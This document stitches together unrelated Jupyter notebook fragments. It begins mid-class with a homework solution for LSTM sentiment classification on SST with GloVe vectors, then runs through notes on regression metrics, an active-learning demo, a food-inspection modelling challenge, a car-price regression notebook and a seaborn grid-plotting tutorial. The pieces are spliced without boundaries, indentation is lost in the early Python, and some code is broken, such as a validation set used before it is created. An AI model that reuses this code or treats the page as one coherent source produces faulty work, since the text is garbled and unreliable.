if not self.pretrained:
self.embedding = nn.Embedding(len(vocab), embed_dim)
self.linear_input = nn.Linear(embed_dim + hidden_dim, hidden_dim)
self.linear_forget = nn.Linear(embed_dim + hidden_dim, hidden_dim)
self.linear_cell = nn.Linear(embed_dim + hidden_dim, hidden_dim)
self.linear_output = nn.Linear(embed_dim + hidden_dim, hidden_dim)
self.classifier = nn.Linear(hidden_dim, 2)
self.sigmoid = nn.Sigmoid()
self.tanh = nn.Tanh()
if dropout:
self.dropout = nn.Dropout(p=0.5)
else:
self.dropout = None
def forward(self, input):
assert self.seq_length == input.size(1) # batch_first
if not self.pretrained:
emb = self.embedding(input)
else:
emb = input
h_t = torch.zeros(emb.size(0), self.hidden_dim, device=emb.device)
c_t = torch.zeros(emb.size(0), self.hidden_dim, device=emb.device)
for seq in range(self.seq_length):
i_t = self.sigmoid(self.linear_input(torch.cat([emb[:, seq, :], h_t], dim=-1)))
f_t = self.sigmoid(self.linear_forget(torch.cat([emb[:, seq, :], h_t], dim=-1)))
g_t = self.tanh(self.linear_cell(torch.cat([emb[:, seq, :], h_t], dim=-1)))
o_t = self.sigmoid(self.linear_output(torch.cat([emb[:, seq, :], h_t], dim=-1)))
c_t = f_t * c_t + i_t * g_t
h_t = o_t * self.tanh(c_t)
if self.dropout is not None:
h_t = self.dropout(h_t)
out = self.classifier(h_t)
return out
lstm = LSTM(seq_length=16, hidden_dim=64, embed_dim=64).cuda()
cel = nn.CrossEntropyLoss()
optimizer = torch.optim.Adam(lstm.parameters(), lr=0.01)
for epoch in range(10):
start = time.time()
lstm.train()
avg_loss = 0
for input, label in train_loader:
logits = lstm(input.cuda())
loss = cel(logits, label.cuda())
avg_loss += loss.item()
optimizer.zero_grad()
loss.backward()
optimizer.step()
end = time.time() - start
print(f'Epoch {epoch+1}, Train Loss {avg_loss / len(train_loader)}, Time {end}s')
lstm.eval()
acc, count = 0, 0
for input, label in valid_loader:
with torch.no_grad():
logits = lstm(input.cuda())
_, preds = torch.max(logits, dim=1)
acc += (preds.cpu().data == label).sum().item()
count += float(input.size(0))
acc /= count
print(f'Epoch {epoch+1}, Valid Acc {acc}')
print('='*50)
print(f'Last Validation Accuracy: {acc}')
### Problem 4.2 ###
lstm = LSTM(seq_length=16, hidden_dim=64, embed_dim=64, dropout=True).cuda()
cel = nn.CrossEntropyLoss()
optimizer = torch.optim.Adam(lstm.parameters(), lr=0.01)
for epoch in range(10):
lstm.train()
avg_loss = 0
for input, label in train_loader:
logits = lstm(input.cuda())
loss = cel(logits, label.cuda())
avg_loss += loss.item()
optimizer.zero_grad()
loss.backward()
optimizer.step()
print(f'Epoch {epoch+1}, Train Loss {avg_loss / len(train_loader)}')
lstm.eval()
acc, count = 0, 0
for input, label in valid_loader:
with torch.no_grad():
logits = lstm(input.cuda())
_, preds = torch.max(logits, dim=1)
acc += (preds.cpu().data == label).sum().item()
count += float(input.size(0))
acc /= count
print(f'Epoch {epoch+1}, Valid Acc {acc}')
print('='*50)
print(f'Last Validation Accuracy: {acc}')
### Problem 4.3 ###
class BiStackedLSTM(nn.Module):
def __init__(self, seq_length, hidden_dim, embed_dim, dropout=False):
super(BiStackedLSTM, self).__init__()
self.seq_length = seq_length
self.hidden_dim = hidden_dim
self.embed_dim = embed_dim
self.embedding = nn.Embedding(len(vocab), embed_dim)
self.layers = nn.ModuleList() # register the gate layers as submodules so model.parameters() includes them
assert embed_dim == hidden_dim # I used the same dimension for convenience
for layer in range(2):
layer_dict = nn.ModuleDict()
layer_dict['input_gate'] = nn.Linear(embed_dim + hidden_dim, hidden_dim)
layer_dict['forget_gate'] = nn.Linear(embed_dim + hidden_dim, hidden_dim)
layer_dict['cell_gate'] = nn.Linear(embed_dim + hidden_dim, hidden_dim)
layer_dict['output_gate'] = nn.Linear(embed_dim + hidden_dim, hidden_dim)
self.layers.append(layer_dict)
self.classifier = nn.Linear(hidden_dim*2, 2)
self.sigmoid = nn.Sigmoid()
self.tanh = nn.Tanh()
if dropout:
self.dropout = nn.Dropout(p=0.5)
else:
self.dropout = None
def forward(self, input):
assert self.seq_length == input.size(1) # batch_first
emb = self.embedding(input)
h_t_bi = []
for direction in [range(self.seq_length), range(self.seq_length)[::-1]]:
# 1st layer
all_h_t = [None] * self.seq_length # first-layer outputs, indexed by time step
h_t = torch.zeros(emb.size(0), self.hidden_dim, device=emb.device)
c_t = torch.zeros(emb.size(0), self.hidden_dim, device=emb.device)
for seq in direction:
i_t = self.sigmoid(self.layers[0]['input_gate'](torch.cat([emb[:, seq, :], h_t], dim=-1)))
f_t = self.sigmoid(self.layers[0]['forget_gate'](torch.cat([emb[:, seq, :], h_t], dim=-1)))
g_t = self.tanh(self.layers[0]['cell_gate'](torch.cat([emb[:, seq, :], h_t], dim=-1)))
o_t = self.sigmoid(self.layers[0]['output_gate'](torch.cat([emb[:, seq, :], h_t], dim=-1)))
c_t = f_t * c_t + i_t * g_t
h_t = o_t * self.tanh(c_t)
if self.dropout is not None:
h_t = self.dropout(h_t)
all_h_t[seq] = h_t # store by time index so the 2nd layer reads the correct step in both directions
# 2nd layer
h_t = torch.zeros(emb.size(0), self.hidden_dim, device=emb.device)
c_t = torch.zeros(emb.size(0), self.hidden_dim, device=emb.device)
for seq in direction:
i_t = self.sigmoid(self.layers[1]['input_gate'](torch.cat([all_h_t[seq], h_t], dim=-1)))
f_t = self.sigmoid(self.layers[1]['forget_gate'](torch.cat([all_h_t[seq], h_t], dim=-1)))
g_t = self.tanh(self.layers[1]['cell_gate'](torch.cat([all_h_t[seq], h_t], dim=-1)))
o_t = self.sigmoid(self.layers[1]['output_gate'](torch.cat([all_h_t[seq], h_t], dim=-1)))
c_t = f_t * c_t + i_t * g_t
h_t = o_t * self.tanh(c_t)
if self.dropout is not None:
h_t = self.dropout(h_t)
h_t_bi.append(h_t) # last (or first) hidden state
h_t_concat = torch.cat(h_t_bi, dim=-1) # [B, hidden_dim*2]
out = self.classifier(h_t_concat)
return out
model = BiStackedLSTM(seq_length=16, hidden_dim=64, embed_dim=64, dropout=True).cuda()
cel = nn.CrossEntropyLoss()
optimizer = torch.optim.Adam(model.parameters(), lr=0.01)
for epoch in range(10):
model.train()
avg_loss = 0
for input, label in train_loader:
logits = model(input.cuda())
loss = cel(logits, label.cuda())
avg_loss += loss.item()
optimizer.zero_grad()
loss.backward()
optimizer.step()
print(f'Epoch {epoch+1}, Train Loss {avg_loss / len(train_loader)}')
model.eval()
acc, count = 0, 0
for input, label in valid_loader:
with torch.no_grad():
logits = model(input.cuda())
_, preds = torch.max(logits, dim=1)
acc += (preds.cpu().data == label).sum().item()
count += float(input.size(0))
acc /= count
print(f'Epoch {epoch+1}, Valid Acc {acc}')
print('='*50)
print(f'Last Validation Accuracy: {acc}')
```
## 5. Pretrained Word Vectors
The last step is to use a pretrained vocabulary and word vectors. The prebuilt vocabulary will replace the vocabulary you built from the SST training data, and the word vectors will replace the embedding vectors. You will observe the power of leveraging self-supervised pretrained models.
> **Problem 5.1 (bonus)** *(2 points)* Go to https://nlp.stanford.edu/projects/glove/ and download `glove.6B.zip`. Use these pretrained word vectors to replace word embeddings in your model from 4.2. Report the model's accuracy on the dev data.
## (Answer)
**Problem 5.1.**
(See the code below.) Validation accuracy of the LSTM using the pretrained embeddings after 10 epochs of training is 70.75%. Leveraging self-supervised pretrained representations helps the downstream classification task.
```
!wget https://nlp.stanford.edu/data/glove.6B.zip
!unzip glove.6B.zip
### Problem 5.1 - (1) ###
import numpy as np
vocab = ['PAD', 'UNK']
embedding = np.zeros((400002, 300), dtype=np.float32)
embedding[1,:] = np.random.randn(300) # random number for UNK
with open('./glove.6B.300d.txt') as f:
for i, line in enumerate(f.readlines()):
vocab.append(line.split(' ')[0])
embedding[i+2] = np.array(line.split(' ')[1:], dtype=np.float32)
word2id = {word: id_ for id_, word in enumerate(vocab)}
print('Vocabulary size: {}'.format(len(vocab)))
### Problem 5.1 - (2) ###
class SSTDataset(torch.utils.data.Dataset):
def __init__(self, split, length=16):
assert split in ['train', 'validation', 'test']
self._data = sst_dataset[split]
self.input_lst, self.label_lst = [], []
for data in self._data:
sentence = data['sentence']
tokens = sentence.split(' ')
input_ids = [word2id[word] if word in word2id else 1 for word in tokens] # UNK if word not found
if len(input_ids) < length:
input_ids = input_ids + [0] * (length - len(input_ids)) # PAD tokens at the end
else:
input_ids = input_ids[:length]
self.input_lst.append(torch.tensor(embedding[input_ids])) # use the pretrained embedding
label = round(data['label'])
self.label_lst.append(label)
def __getitem__(self, idx):
return self.input_lst[idx], self.label_lst[idx]
def __len__(self):
return len(self._data)
trainset = SSTDataset('train')
validset = SSTDataset('validation')
train_loader = torch.utils.data.DataLoader(trainset, batch_size=16, shuffle=True)
valid_loader = torch.utils.data.DataLoader(validset, batch_size=16, shuffle=False)
### Problem 5.1 - (3) ###
lstm = LSTM(seq_length=16, hidden_dim=128, embed_dim=300, dropout=True, pretrained=True).cuda()
cel = nn.CrossEntropyLoss()
optimizer = torch.optim.Adam(lstm.parameters(), lr=0.01)
for epoch in range(10):
lstm.train()
avg_loss = 0
for input, label in train_loader:
logits = lstm(input.cuda())
loss = cel(logits, label.cuda())
avg_loss += loss.item()
optimizer.zero_grad()
loss.backward()
optimizer.step()
print(f'Epoch {epoch+1}, Train Loss {avg_loss / len(train_loader)}')
lstm.eval()
acc, count = 0, 0
for input, label in valid_loader:
with torch.no_grad():
logits = lstm(input.cuda())
_, preds = torch.max(logits, dim=1)
acc += (preds.cpu().data == label).sum().item()
count += float(input.size(0))
acc /= count
print(f'Epoch {epoch+1}, Valid Acc {acc}')
print('='*50)
print(f'Last Validation Accuracy: {acc}')
```
# Regression Metrics
Metrics covered:
#### 1) MSE, RMSE, R-squared
#### 2) MAE
#### 3) (R)MSPE, MAPE
#### 4) (R)MSLE
#### Notation

# MSE: Mean Squared Error

### How to evaluate MSE ?
First, build a baseline and check whether your model beats it.
A `baseline` is the best constant model; it differs between metrics.
For `MSE`, the best constant is the `target mean`.
So compute the baseline MSE and see if your model beats it.

## RMSE (Root Mean Squared Error)

So why do we need RMSE?
- To bring the error back to the scale of the target.
`Similarity`: MSE and RMSE have the same minimizers, so minimizing MSE automatically minimizes RMSE.
`Difference`: they are not interchangeable for gradient-based models, because the RMSE gradient is the MSE gradient rescaled by 1/(2*sqrt(MSE)), which acts like a different, dynamic learning rate.
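The gradient relationship can be made precise: writing $\mathrm{RMSE} = \sqrt{\mathrm{MSE}}$ and applying the chain rule gives

$$\frac{\partial\,\mathrm{RMSE}}{\partial \hat{y}_i} = \frac{1}{2\sqrt{\mathrm{MSE}}}\,\frac{\partial\,\mathrm{MSE}}{\partial \hat{y}_i}$$

so the RMSE gradient is just the MSE gradient multiplied by a factor that shrinks as the error grows, effectively a dynamic learning rate.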
# R-squared

R^2 = 0 (not better than the baseline)
R^2 = 1 (the model explains 100% of the variability in the data, which does not always mean a good model)
We can optimize R-squared by optimizing MSE or RMSE.
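Since R-squared is one minus MSE over the target variance, it follows directly from the quantities used for the MSE baseline. A sketch with hypothetical numbers:

```python
import numpy as np

y_true = np.array([1.0, 2.0, 3.0, 4.0])
y_pred = np.array([1.5, 2.0, 2.5, 4.5])

mse = np.mean((y_true - y_pred) ** 2)
var = np.mean((y_true - y_true.mean()) ** 2)  # MSE of the best constant model
r2 = 1 - mse / var

print(r2)  # 0 means no better than the constant baseline, 1 means a perfect fit
```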
# MAE: Mean Absolute Error

- Not sensitive to outliers: more robust than MSE
- Mostly used in finance
How to evaluate MAE?
Compute the baseline MAE and check whether your model beats it.

# General guide of regression metrics
- If `unusual objects are normal`, do not ignore them: use MSE.
- Otherwise, if unusual objects are mistakes (entry mistakes, ETL mistakes, typos), use MAE.
# Regression Metrics for Relative Error
Shop 1: predicted 9, sold 10, MSE = 1
Shop 2: predicted 999, sold 1000, MSE = 1
It's clear that Shop 2 did better even though the MSE is the same, so we need a metric that measures relative error. Compare the absolute error with the relative one:
Shop 1: predicted 9, sold 10, MSE = 1
Shop 2: predicted 900, sold 1000, MSE = 10'000
Shop 1: predicted 9, sold 10, relative_metric = 1
Shop 2: predicted 900, sold 1000, relative_metric = 1
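The shop example can be checked directly with a percentage-error metric (a sketch; MAPE is defined formally below):

```python
import numpy as np

def mape(y_true, y_pred):
    # mean absolute percentage error
    return np.mean(np.abs((y_true - y_pred) / y_true)) * 100

# Shop 1: predicted 9, sold 10; Shop 2: predicted 900, sold 1000
shop1 = mape(np.array([10.0]), np.array([9.0]))
shop2 = mape(np.array([1000.0]), np.array([900.0]))
print(shop1, shop2)  # ~10% for both: equal relative error despite different scales
```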
# MSPE: Mean Squared Percentage Error (measures relative error)

To evaluate MSPE, check if your model beats baseline.

# MAPE: Mean Absolute Percentage Error (measures relative error)

To evaluate MAPE, check if your model beats baseline.

# RMSLE: Root Mean Squared Logarithmic Error (measures relative error)

To evaluate, compare with the baseline. Here the best constant is not the plain target mean but the mean taken in log space (roughly `exp(mean(log(y_target)))`).
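RMSLE is just RMSE computed on `log(1 + y)`. A sketch showing that it responds to relative rather than absolute error:

```python
import numpy as np

def rmsle(y_true, y_pred):
    # RMSE computed in log1p space
    return np.sqrt(np.mean((np.log1p(y_pred) - np.log1p(y_true)) ** 2))

r1 = rmsle(np.array([10.0]), np.array([9.0]))
r2 = rmsle(np.array([1000.0]), np.array([900.0]))
print(r1, r2)  # nearly equal: both predictions are off by about 10%
```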
# Example of simple use of active learning API
Compare 3 query strategies: random sampling, uncertainty sampling, and active search.
Observe how we trade off between finding targets and accuracy.
# Imports
```
import warnings
warnings.filterwarnings(action='ignore', category=RuntimeWarning)
from matplotlib import pyplot as plt
import numpy as np
from sklearn.base import clone
from sklearn.datasets import make_moons
from sklearn.svm import SVC
import active_learning
from active_learning.utils import *
from active_learning.query_strats import random_sampling, uncertainty_sampling, active_search
%matplotlib inline
np.random.seed(0)
```
# Load toy data
We have a small binary classification task that is not linearly separable.
```
X, y = make_moons(noise=0.1, n_samples=200)
plt.scatter(X[y==0,0], X[y==0,1])
plt.scatter(X[y==1,0], X[y==1,1])
```
# Training Models
```
# Our basic classifier will be an SVM with an RBF kernel
base_clf = SVC(probability=True)
# size of the initial labeled set
init_L_size = 5
# Make 30 queries
n_queries = 30
# set random state for consistency in training data
random_state = 123
```
### Random Sampling
```
random_experiment_data = perform_experiment(
X, y,
base_estimator=clone(base_clf),
query_strat=random_sampling,
n_queries=n_queries,
init_L_size=init_L_size,
random_state=random_state
)
```
### Uncertainty Sampling
```
uncertainty_experiment_data = perform_experiment(
X, y,
base_estimator=clone(base_clf),
query_strat=uncertainty_sampling,
n_queries=n_queries,
init_L_size=init_L_size,
random_state=random_state
)
```
### Active Search
```
as_experiment_data = perform_experiment(
X, y,
base_estimator=clone(base_clf),
query_strat=active_search,
n_queries=n_queries,
init_L_size=init_L_size,
random_state=random_state
)
```
# Compare
```
xx = np.arange(n_queries)
plt.plot(xx, random_experiment_data["accuracy"], label="Random")
plt.plot(xx, uncertainty_experiment_data["accuracy"], label="Uncertainty")
plt.plot(xx, as_experiment_data["accuracy"], label="AS")
plt.title("Accuracy on Test Set vs Num Queries")
plt.ylabel("accuracy")
plt.xlabel("# queries")
plt.legend()
plt.plot(xx, random_experiment_data["history"], label="Random")
plt.plot(xx, uncertainty_experiment_data["history"], label="Uncertainty")
plt.plot(xx, as_experiment_data["history"], label="AS")
plt.title("Number of targets found")
plt.ylabel("# of targets")
plt.xlabel("# queries")
plt.legend()
```
<a href="https://colab.research.google.com/github/gagansingh23/DS-Unit-2-Applied-Modeling/blob/master/Gagan_Singh_DS11_Sprint_Challenge_7.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
_Lambda School Data Science, Unit 2_
# Applied Modeling Sprint Challenge: Predict Chicago food inspections 🍕
For this Sprint Challenge, you'll use a dataset with information from inspections of restaurants and other food establishments in Chicago from January 2010 to March 2019.
[See this PDF](https://data.cityofchicago.org/api/assets/BAD5301B-681A-4202-9D25-51B2CAE672FF) for descriptions of the data elements included in this dataset.
According to [Chicago Department of Public Health — Food Protection Services](https://www.chicago.gov/city/en/depts/cdph/provdrs/healthy_restaurants/svcs/food-protection-services.html), "Chicago is home to 16,000 food establishments like restaurants, grocery stores, bakeries, wholesalers, lunchrooms, mobile food vendors and more. Our business is food safety and sanitation with one goal, to prevent the spread of food-borne disease. We do this by inspecting food businesses, responding to complaints and food recalls."
#### Your challenge: Predict whether inspections failed
The target is the `Fail` column.
- When the food establishment failed the inspection, the target is `1`.
- When the establishment passed, the target is `0`.
#### Run this cell to install packages in Colab:
```
%%capture
import sys
if 'google.colab' in sys.modules:
# Install packages in Colab
!pip install category_encoders==2.*
!pip install eli5
!pip install pandas-profiling==2.*
!pip install pdpbox
!pip install shap
```
#### Run this cell to load the data:
```
import pandas as pd
train_url = 'https://drive.google.com/uc?export=download&id=13_tP9JpLcZHSPVpWcua4t2rY44K_s4H5'
test_url = 'https://drive.google.com/uc?export=download&id=1GkDHjsiGrzOXoF_xcYjdzBTSjOIi3g5a'
train = pd.read_csv(train_url)
test = pd.read_csv(test_url)
assert train.shape == (51916, 17)
assert test.shape == (17306, 17)
#Installers
import category_encoders as ce
from sklearn.model_selection import train_test_split
from xgboost import XGBClassifier
from sklearn.metrics import roc_auc_score
from pdpbox.pdp import pdp_isolate, pdp_plot
import matplotlib.pyplot as plt
from pdpbox.pdp import pdp_interact, pdp_interact_plot
```
### Part 1: Preprocessing
You may choose which features you want to use, and whether/how you will preprocess them. If you use categorical features, you may use any tools and techniques for encoding.
_To earn a score of 3 for this part, find and explain leakage. The dataset has a feature that will give you an ROC AUC score > 0.90 if you process and use the feature. Find the leakage and explain why the feature shouldn't be used in a real-world model to predict the results of future inspections._
### Part 2: Modeling
**Fit a model** with the train set. (You may use scikit-learn, xgboost, or any other library.) Use cross-validation or do a three-way split (train/validate/test) and **estimate your ROC AUC** validation score.
Use your model to **predict probabilities** for the test set. **Get an ROC AUC test score >= 0.60.**
_To earn a score of 3 for this part, get an ROC AUC test score >= 0.70 (without using the feature with leakage)._
### Part 3: Visualization
Make visualizations for model interpretation. (You may use any libraries.) Choose two of these types:
- Confusion Matrix
- Permutation Importances
- Partial Dependence Plot, 1 feature isolation
- Partial Dependence Plot, 2 features interaction
- Shapley Values
_To earn a score of 3 for this part, make four of these visualization types._
## Part 1: Preprocessing
> You may choose which features you want to use, and whether/how you will preprocess them. If you use categorical features, you may use any tools and techniques for encoding.
```
#Feature Selection
train.describe(exclude='number').nunique()
train.columns
train.Fail.value_counts(normalize=True)
train_practice = train[train['Violations'].str.contains("HAZARD", na=False)]
train_practice.Fail.value_counts(normalize=True)
target = 'Fail'
train_features = train.drop(columns=[target])
cardinality = train_features.select_dtypes(exclude='number').nunique()
categorical_features = cardinality[cardinality <= 40].index.tolist()
numerical_features = train_features.select_dtypes(include='number').columns.tolist()
categorical_features
features = categorical_features + numerical_features
X_train = train[features]
y_train = train[target]
X_val = val[features] # `val` comes from the train/val split in Part 2
y_val = val[target]
X_test = test[features]
y_test = test[target]
#One Hot Encode all categorical variables with low cardinality
encoder = ce.OneHotEncoder()
X_train_encoded = encoder.fit_transform(X_train)
X_val_encoded = encoder.transform(X_val)
```
## Part 2: Modeling
> **Fit a model** with the train set. (You may use scikit-learn, xgboost, or any other library.) Use cross-validation or do a three-way split (train/validate/test) and **estimate your ROC AUC** validation score.
>
> Use your model to **predict probabilities** for the test set. **Get an ROC AUC test score >= 0.60.**
```
#Perform a three way split
train, val = train_test_split(train, train_size=0.90, test_size=0.10,
stratify=train['Fail'], random_state=42)
train.shape, val.shape, test.shape
#Fit The Model
model = XGBClassifier(n_estimators=100, n_jobs=-1)
model.fit(X_train_encoded, y_train)
# hard predictions on the validation set
y_pred = model.predict(X_val_encoded)
roc_auc_score(y_val, y_pred)
# For ROC AUC we should use predicted probabilities, not discrete predictions.
y_pred_proba = model.predict_proba(X_val_encoded)[:,-1]
print('Validation ROC AUC', roc_auc_score(y_val, y_pred_proba))
```
## Part 3: Visualization
> Make visualizations for model interpretation. (You may use any libraries.) Choose two of these types:
>
> - Permutation Importances
> - Partial Dependence Plot, 1 feature isolation
> - Partial Dependence Plot, 2 features interaction
> - Shapley Values
**Partial Dependence Plot, 1 feature isolation**
```
features
target = 'Fail'
features = train.columns.drop([target])
X = train[features]
y = train[target]
encoder = ce.OrdinalEncoder()
X_encoded = encoder.fit_transform(X)
model = XGBClassifier(n_estimators=100, random_state=42, n_jobs=-1)
model.fit(X_encoded, y)
from pdpbox import pdp
feature = 'Risk'
pdp_dist = pdp.pdp_isolate(model=model, dataset=X_encoded, model_features=features,
feature=feature)
pdp.pdp_plot(pdp_dist, feature);
```
**Partial Dependence Plot, 2 Feature Interaction**
```
features = ['Risk', 'Inspection Type']
interactions = pdp_interact(
model=model,
dataset=X_encoded,
model_features=X_encoded.columns,
features=features
)
pdp_interact_plot(interactions, plot_type='grid', feature_names=features);
```
<a href="https://colab.research.google.com/github/aruanalucena/Car-Price-Prediction-Machine-Learning/blob/main/Car_Price_Prediction_.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# **Car Price Prediction with python**.
# **Previsão de preço de carro com Python**.


```
%%html
<h1><marquee style='width: 100% ', font color= 'arrows';><b>Car Price Prediction </b></marquee></h1>
```
# Importing the Dependencies
# <font color = 'blue'> Importando as bibliotecas
***
```
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.linear_model import LinearRegression
from sklearn.model_selection import train_test_split
from sklearn.linear_model import Lasso
from sklearn import metrics
```
# Data Collection and Data Analisys
# <font color='blue'> Coleta e Análise dos Dados
- loading the data from csv file to pandas DataFrame
-<font color='blue'> Carregando os dados em csv para o pandas DataFrame
***
```
car_data= pd.read_csv('/content/car data.csv')
print(car_data)
car_data.head()
```
- Checking the number of rows and columns in the data frame
-<font color='blue'> Checando numero de linhas e colunas do data frame
***
```
car_data.shape
```
- Getting some information about the dataset
-<font color='blue'> Pegando algumas informações dos dados
***
```
car_data.info()
```
- Checking the number of missing values
-<font color='blue'> Checando o numero de valores faltantes
***
```
car_data.isnull().sum()
```
- Checking the distribution of the categorical data
***
```
print(car_data.Fuel_Type.value_counts())
print(car_data.Seller_Type.value_counts())
print(car_data.Transmission.value_counts())
```
- Encoding the categorical data
```
# encoding "Fuel_Type"Column
car_data.replace({'Fuel_Type' :{'Petrol':0,'Diesel':1,'CNG':2}},inplace=True)
# encoding "Seller_Type"Column
car_data.replace({'Seller_Type' :{'Dealer':0,'Individual':1}},inplace=True)
# encoding "Transmission"Column
car_data.replace({'Transmission' :{'Manual':0,'Automatic':1}},inplace=True)
car_data.head()
```
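The nested-dict `replace` pattern above maps each category string to an integer in place; a minimal sketch on a toy frame (the data here is made up):

```python
import pandas as pd

# toy frame with one categorical column (hypothetical values)
toy = pd.DataFrame({'Fuel_Type': ['Petrol', 'Diesel', 'CNG', 'Petrol']})

# same pattern as above: outer key = column name, inner dict = category -> code
toy.replace({'Fuel_Type': {'Petrol': 0, 'Diesel': 1, 'CNG': 2}}, inplace=True)
print(toy['Fuel_Type'].tolist())  # [0, 1, 2, 0]
```

The inner dict only touches the named column, so other columns are left untouched.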
- Separating the features and the target
***
```
X = car_data.drop(['Car_Name', 'Selling_Price'], axis=1)
Y = car_data['Selling_Price']
print(X)
print(Y)
```
- Splitting the data into training and test sets
***
```
X_train, X_test, Y_train, Y_test = train_test_split(X,Y, test_size=0.1, random_state=2)
```
- Model Training --> Linear Regression
***
# Building the Model
- Training the Model
***
- Loading the Model
```
lin_reg_model = LinearRegression()
lin_reg_model.fit(X_train, Y_train)
```
# Model Evaluation
- Accuracy on the training data
***
```
train_data_prediction = lin_reg_model.predict(X_train)
print(train_data_prediction)
```
- R squared error
***
```
error_score = metrics.r2_score(Y_train, train_data_prediction)
print(' R squared Error : ', error_score)
```
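`metrics.r2_score` computes the coefficient of determination, R² = 1 − SS_res / SS_tot; a quick NumPy check of that formula on hand-picked numbers (not the car data):

```python
import numpy as np

y_true = np.array([3.0, 5.0, 2.0, 7.0])
y_pred = np.array([2.5, 5.0, 3.0, 8.0])

ss_res = np.sum((y_true - y_pred) ** 2)          # residual sum of squares
ss_tot = np.sum((y_true - y_true.mean()) ** 2)   # total sum of squares
r2 = 1 - ss_res / ss_tot
print(r2)
```

A perfect fit gives R² = 1; a model no better than predicting the mean gives R² = 0.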
- Visualizing the actual prices and the predicted prices
***
```
plt.scatter(Y_train, train_data_prediction)
plt.xlabel('Actual Prices')
plt.ylabel('Predicted Prices')
plt.title('Actual Prices vs Predicted Prices')
plt.show()
test_data_prediction = lin_reg_model.predict(X_test)
error_score = metrics.r2_score(Y_test, test_data_prediction)
print(" R squared Error : ", error_score)
plt.scatter(Y_test, test_data_prediction)
plt.xlabel('Actual Prices')
plt.ylabel('Predicted Prices')
plt.title('Actual Prices vs Predicted Prices')
plt.show()
```
# Lasso Regression
```
lass_reg_model = Lasso()
lass_reg_model.fit(X_train, Y_train)
train_data_prediction = lass_reg_model.predict(X_train)
print(train_data_prediction)
# evaluate the Lasso model on the held-out test set
test_data_prediction = lass_reg_model.predict(X_test)
error_score = metrics.r2_score(Y_test, test_data_prediction)
print(' R squared Error : ', error_score)
plt.scatter(Y_test, test_data_prediction)
plt.xlabel('Actual Prices')
plt.ylabel('Predicted Prices')
plt.title('Actual Prices vs Predicted Prices')
plt.show()
```
# The end
***
|
github_jupyter
|
```
import seaborn as sns
import matplotlib.pyplot as plt
sns.set(style="ticks")
%matplotlib inline
import numpy as np
np.random.seed(sum(map(ord, "axis_grids")))
```
```
tips = sns.load_dataset("tips")
g = sns.FacetGrid(tips, col="time")
```
```
g = sns.FacetGrid(tips, col="time")
g.map(plt.hist, "tip");
```
```
g = sns.FacetGrid(tips, col="sex", hue="smoker")
g.map(plt.scatter, "total_bill", "tip", alpha=.7)
g.add_legend();
```
```
g = sns.FacetGrid(tips, row="smoker", col="time", margin_titles=True)
g.map(sns.regplot, "size", "total_bill", color=".3", fit_reg=False, x_jitter=.1);
```
```
g = sns.FacetGrid(tips, col="day", height=4, aspect=.5)
g.map(sns.barplot, "sex", "total_bill");
```
```
ordered_days = tips.day.value_counts().index
g = sns.FacetGrid(tips, row="day", row_order=ordered_days,
height=1.7, aspect=4,)
g.map(sns.distplot, "total_bill", hist=False, rug=True);
```
```
pal = dict(Lunch="seagreen", Dinner="gray")
g = sns.FacetGrid(tips, hue="time", palette=pal, height=5)
g.map(plt.scatter, "total_bill", "tip", s=50, alpha=.7, linewidth=.5, edgecolor="white")
g.add_legend();
```
```
g = sns.FacetGrid(tips, hue="sex", palette="Set1", height=5, hue_kws={"marker": ["^", "v"]})
g.map(plt.scatter, "total_bill", "tip", s=100, linewidth=.5, edgecolor="white")
g.add_legend();
```
```
attend = sns.load_dataset("attention").query("subject <= 12")
g = sns.FacetGrid(attend, col="subject", col_wrap=4, height=2, ylim=(0, 10))
g.map(sns.pointplot, "solutions", "score", color=".3", ci=None);
```
```
with sns.axes_style("white"):
    g = sns.FacetGrid(tips, row="sex", col="smoker", margin_titles=True, height=2.5)
g.map(plt.scatter, "total_bill", "tip", color="#334488", edgecolor="white", lw=.5);
g.set_axis_labels("Total bill (US Dollars)", "Tip");
g.set(xticks=[10, 30, 50], yticks=[2, 6, 10]);
g.fig.subplots_adjust(wspace=.02, hspace=.02);
```
```
g = sns.FacetGrid(tips, col="smoker", margin_titles=True, height=4)
g.map(plt.scatter, "total_bill", "tip", color="#338844", edgecolor="white", s=50, lw=1)
for ax in g.axes.flat:
    ax.plot((0, 50), (0, .2 * 50), c=".2", ls="--")
g.set(xlim=(0, 60), ylim=(0, 14));
```
```
from scipy import stats
def quantile_plot(x, **kwargs):
    qntls, xr = stats.probplot(x, fit=False)
    plt.scatter(xr, qntls, **kwargs)
g = sns.FacetGrid(tips, col="sex", height=4)
g.map(quantile_plot, "total_bill");
```
```
def qqplot(x, y, **kwargs):
    _, xr = stats.probplot(x, fit=False)
    _, yr = stats.probplot(y, fit=False)
    plt.scatter(xr, yr, **kwargs)
g = sns.FacetGrid(tips, col="smoker", height=4)
g.map(qqplot, "total_bill", "tip");
```
```
g = sns.FacetGrid(tips, hue="time", col="sex", height=4)
g.map(qqplot, "total_bill", "tip")
g.add_legend();
```
```
g = sns.FacetGrid(tips, hue="time", col="sex", height=4,
hue_kws={"marker": ["s", "D"]})
g.map(qqplot, "total_bill", "tip", s=40, edgecolor="w")
g.add_legend();
```
```
def hexbin(x, y, color, **kwargs):
    cmap = sns.light_palette(color, as_cmap=True)
    plt.hexbin(x, y, gridsize=15, cmap=cmap, **kwargs)
with sns.axes_style("dark"):
    g = sns.FacetGrid(tips, hue="time", col="time", height=4)
g.map(hexbin, "total_bill", "tip", extent=[0, 50, 0, 10]);
```
```
iris = sns.load_dataset("iris")
g = sns.PairGrid(iris)
g.map(plt.scatter);
```
```
g = sns.PairGrid(iris)
g.map_diag(plt.hist)
g.map_offdiag(plt.scatter);
```
```
g = sns.PairGrid(iris, hue="species")
g.map_diag(plt.hist)
g.map_offdiag(plt.scatter)
g.add_legend();
```
```
g = sns.PairGrid(iris, vars=["sepal_length", "sepal_width"], hue="species")
g.map(plt.scatter);
```
```
g = sns.PairGrid(iris)
g.map_upper(plt.scatter)
g.map_lower(sns.kdeplot)
g.map_diag(sns.kdeplot, lw=3, legend=False);
```
```
g = sns.PairGrid(tips, y_vars=["tip"], x_vars=["total_bill", "size"], height=4)
g.map(sns.regplot, color=".3")
g.set(ylim=(-1, 11), yticks=[0, 5, 10]);
```
```
g = sns.PairGrid(tips, hue="size", palette="GnBu_d")
g.map(plt.scatter, s=50, edgecolor="white")
g.add_legend();
```
```
